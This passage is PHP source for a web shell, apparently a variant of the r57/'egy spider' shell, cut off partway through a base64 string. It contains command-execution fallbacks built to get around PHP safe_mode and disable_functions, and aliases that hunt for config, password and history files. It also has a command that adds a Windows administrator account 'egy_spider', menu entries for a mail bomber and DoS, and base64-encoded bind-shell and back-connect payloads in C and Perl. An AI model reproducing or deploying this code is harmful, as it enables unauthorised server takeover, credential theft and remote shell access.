+'eng_text136'=>'Creating evil symlink', +'eng_text137'=>'Useful', +'eng_text138'=>'Dangerous', +'eng_text139'=>'Mail Bomber', +'eng_text140'=>'DoS', +'eng_text141'=>'Danger! Web-daemon crash possible.', +'eng_text142'=>'Downloaders', +'eng_text143'=>'Temp: ', +'eng_text144'=>'Test bypass safe_mode with load file in mysqli', +'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'eng_text146'=>'Max Interation', +'eng_text151'=>'Test bypass safe_mode with chdir()and ftok() (PHP <= 5.2.6)', +'eng_text161'=>'Test bypass safe_mode with posix_access() (posix ext) (PHP <= 5.2.6)', +'eng_text162'=>'ionCube extension safe_mode and disable_functions protections bypass (PHP <= 5.2.4)', +'eng_text163'=>'PHP Perl Extension Safe_mode Bypass Exploit', +'eng_text170'=>' Test bypass safe_mode and Open_basedir Settings by Posix_getpw (PHP <= 4.2.0)', +'eng_text171'=>' PHP (Win32std) Extension safe_mode/disable_functions Protections Bypass (PHP <= 5.2.3)', +'eng_text147'=>'', +'eng_text148'=>'', +'eng_text149'=>'', +'eng_text150'=>'', +'eng_text159'=>'About egy spider', +'eng_text152'=>'Latest News', +'eng_text153'=>'Logout ', +'eng_text154'=>'Quick index ', +'eng_text155'=>'Mass Code Injection ', +'eng_text156'=>'File source ', +'eng_text157'=>'Registration in Zone-h ', +'eng_text158'=>'Hash Tools ', +'eng_text160'=>'Home Shell ', +'eng_text180'=>'Send Your Comments And Contacted Me ', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', + + +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. 
+*/ +$aliases=array( +'----------------------------------locate'=>'', +'find httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate proftpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate psybnc.conf'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate my.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate admin.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate cfg.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate conf.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.dat files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.inc.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate config.default.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .pwd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .sql files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .htpasswd files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .bash_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate .mysql_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate backup files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate dump files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate priv files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________find orders ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'cat /var/cpanel/accounting.log'=>'cat /var/cpanel/accounting.log', +'find all site of server and user'=>'ls -la /etc/valiases', +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . 
-type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'________________var orders var______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error_log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ access.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ error.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'find /var/ "*.log" files'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'________________for server windows ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt', +'1_learn the management server'=>'net user', +'2_add new user'=>'net user egy_spider 123456 /add', +'3_add your user for admin group (this order after add order 1&2'=>'net localgroup administrators egy_spider /add', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "
:: "; +$table_up2 = " ::
"; +$table_up3 = ""; +$arrow = " 4"; +$lb = "["; +$rb = "]"; +$font = ""; +$ts = "
"; +$table_end1 = "
"; +$te = "
"; +$fs = ""; +$fe = ""; + + +if(isset($_GET['users'])) + { + if(!$users=get_users('/etc/passwd')) { echo "
".$lang[$language.'_text96']."
"; } + else + { + echo '
'; + foreach($users as $user) { echo $user."
"; } + echo '
'; + } + echo "
[ BACK ]
"; die(); + } + + +if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } +if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = @php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } + + +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= ""; + foreach($res as $file=>$v) + { + $r .= ""; + $r .= ""; + foreach($v as $a=>$b) + { + $r .= ""; + $r .= ""; + $r .= ""; + $r .= "\n"; + } + } + $r .= "
".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
".$a."".ws(2).$b."
"; + echo $r; + } + else + { + echo "

".$lang[$language.'_text56']."

"; + } + echo "
[ BACK ]
"; + die(); + } + + +/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } + + +function ws($i) +{ +return @str_repeat(" ",$i); +} + + +function ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(@function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(@function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(@function_exists('system')) + { + @ob_start(); + @system('$cfe'); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fread($f,1024); } + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($f)) { $res .= @fgets($f,1024); } + } + @pclose($f); + } + elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) + { + $res = ""; + if(@function_exists('fread') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} + } + @proc_close($f); + } + }else{$res = safe_ex($cfe);} + return htmlspecialchars($res); +} + + + + +function safe_ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(extension_loaded('perl')){ + @ob_start(); + $safeperl=new perl(); + $safeperl->eval("system('$cfe')"); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(!$unix && extension_loaded('ffi')) + { + $output=$tempdir.uniqid('NJ'); + 
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); + if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);} + else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded('win32service')) + { + $output=$tempdir.uniqid('NJ'); + $n_ser=uniqid('NJ'); + if(!@function_exists('escapeshellarg')) + {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));} + else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));} + @win32_start_service($n_ser); + @win32_stop_service($n_ser); + @win32_delete_service($n_ser); + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded("win32std")) + { + $output=$tempdir.uniqid('NJ'); + if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix) + { + $output=$tempdir.uniqid('NJ'); + $suntzu = new COM("WScript.Shell"); + if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' 
> "'.$output.'"');} + $res=moreread($output); + @unlink($output); + } + elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) + { + $res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; + $output=$tempdir.uniqid('pcntl'); + $pid = @pcntl_fork(); + if ($pid == -1) { + $res .= '[-] Could not children fork. Exit'; + } else if ($pid) { + if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} + else {$res .= '[-] Error. Command incorrect.';} + } else { + $cfe = array(" -e 'system(\"$cfe > $output\")'"); + if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); + if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); + die(); + } + $res=moreread($output); + @unlink($output); + } +/* elseif(1) + { + + } +*/ + } + return htmlspecialchars($res); +} + + +function get_users($filename) +{ + $users = $rows = array(); + $rows=@explode("\n",moreread($filename)); + if(!$rows[0]){$rows=@explode("\n",readzlib($filename));} + if(!$rows[0]) return 0; + foreach ($rows as $string) + { + $user = @explode(":",trim($string)); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '
'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 
't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = ""; +} +function which($pr) +{ +$path = ''; +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function ps($pr) +{global $unix; +$path = ''; +if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} +else{$path = ex("tasklist | findstr \"$pr\"");} +if(!empty($path)) { return $path; } else { return false; } +} +function locate($pr) +{ +$path = ''; +$path = ex("locate $pr"); +if(!empty($path)) { return $path; } else { return false; } +} +function cf($fname,$text) +{ + if(!morewrite($fname,@base64_decode($text))){err(0);}; +} +function sr($l,$t1,$t2) + { + return "".$t1."".$t2.""; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = 
@preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"\\1",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 
